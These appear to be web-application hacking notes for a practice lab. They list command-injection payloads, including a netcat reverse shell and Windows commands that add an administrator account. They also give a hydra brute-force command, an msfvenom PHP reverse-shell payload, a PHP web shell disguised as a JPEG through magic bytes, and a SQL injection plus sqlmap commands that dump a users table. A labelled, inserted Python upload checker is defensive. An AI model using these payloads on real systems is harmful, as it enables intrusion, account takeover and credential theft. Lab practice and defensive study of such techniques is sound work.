Hacking Web Applications and Web Servers
Command Execution
Linux
127.0.0.1 && ls
127.0.0.1 & ls
127.0.0.1 ; ls
127.0.0.1 | ls
- with space
127.0.0.1 |ls
- without space
127.0.0.1 && nc -c sh 127.0.0.1 9001
Windows
hostname
whoami
tasklist
taskkill /PID 3112 /F
- forcefully kills the process
dir c:\
net user
net user test /add
- add a new user
net localgroup Administrators test /add
- add test user to Administrators
net user test
- details of the user
dir c:\"pin.txt"
type c:\"pin.txt"
Brute-Forcing
hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect'
File Upload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
exploit.php.img
GIF89a;
- add this line to the start of any file to make it look like an image file
use multi/handler
# PHP web shell disguised as image/jpeg: the JPEG SOI+APP0 magic bytes come first
# so a magic-byte or Content-Type check sees an image, followed by the PHP payload
with open('shell.php', 'wb') as fh:
    fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
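Added example, not from the original notes: server-side upload checks that reject the two tricks above (the .php.img double extension and image magic bytes prepended to PHP code). The sample filenames and byte strings are constructed; the magic-byte table and the JPEG segment walk follow the standard formats.

```python
# Added example: stdlib-only upload checks against the bypasses in these notes,
# the double extension (exploit.php.img) and image magic bytes glued onto PHP.
import re

ALLOWED = {"jpg": b"\xFF\xD8\xFF", "jpeg": b"\xFF\xD8\xFF",
           "gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n"}  # ext -> magic bytes
# PHP open tags and script tags have no business inside an image
CODE_TAGS = re.compile(rb"<\?|<script", re.IGNORECASE)

def jpeg_segments_ok(data: bytes) -> bool:
    """Walk JPEG marker segments (FF xx + 2-byte big-endian length) up to SOS.
    FF D8 FF E0 followed by PHP text fails: the bytes after the APP0 marker
    are not a segment length that fits inside the file."""
    i = 2  # skip SOI (FF D8)
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            return False
        if data[i + 1] == 0xDA:  # SOS: compressed scan data follows, stop here
            return True
        length = int.from_bytes(data[i + 2:i + 4], "big")
        if length < 2 or i + 2 + length > len(data):
            return False
        i += 2 + length
    return False

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason); cheapest checks run first."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED:
        return False, "extension not allowed (exactly one image extension)"
    ext = parts[1]
    if not data.startswith(ALLOWED[ext]):
        return False, f"magic bytes do not match .{ext}"
    if CODE_TAGS.search(data):
        return False, "embedded code tag found"
    if ext in ("jpg", "jpeg") and not jpeg_segments_ok(data):
        return False, "malformed JPEG segment structure"
    return True, "ok"

# Constructed samples: the notes' JPEG polyglot and a minimal well-formed
# JPEG header (APP0 segment followed by SOS, no real image data).
POLYGLOT = b"\xFF\xD8\xFF\xE0" + b'<? passthru($_GET["cmd"]); ?>'
GOOD_JPEG = (b"\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01"
             b"\x00\x00\xFF\xDA\x00\x02")

if __name__ == "__main__":
    for name, blob in [("shell.jpg", POLYGLOT), ("exploit.php.img", POLYGLOT),
                       ("x.jpg", b"\xFF\xD8\xFF\xE0not a segment"), ("ok.jpg", GOOD_JPEG)]:
        print(name, check_upload(name, blob))
```

The tag scan is a blocklist and can be evaded by encoding, so in production re-encode the image with a real decoder and store uploads where the web server never executes scripts.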
SQL Injection
Manual
1' UNION SELECT user, password FROM users#
Sqlmap
sqlmap -r req.txt --batch
sqlmap -r req.txt --batch --level=5 --risk=3
sqlmap -r req.txt --batch --level=5 --risk=3 --current-db
sqlmap -r req.txt -D dvwa --tables
sqlmap -r req.txt -D dvwa -T users --columns
sqlmap -r req.txt -D dvwa -T users --dump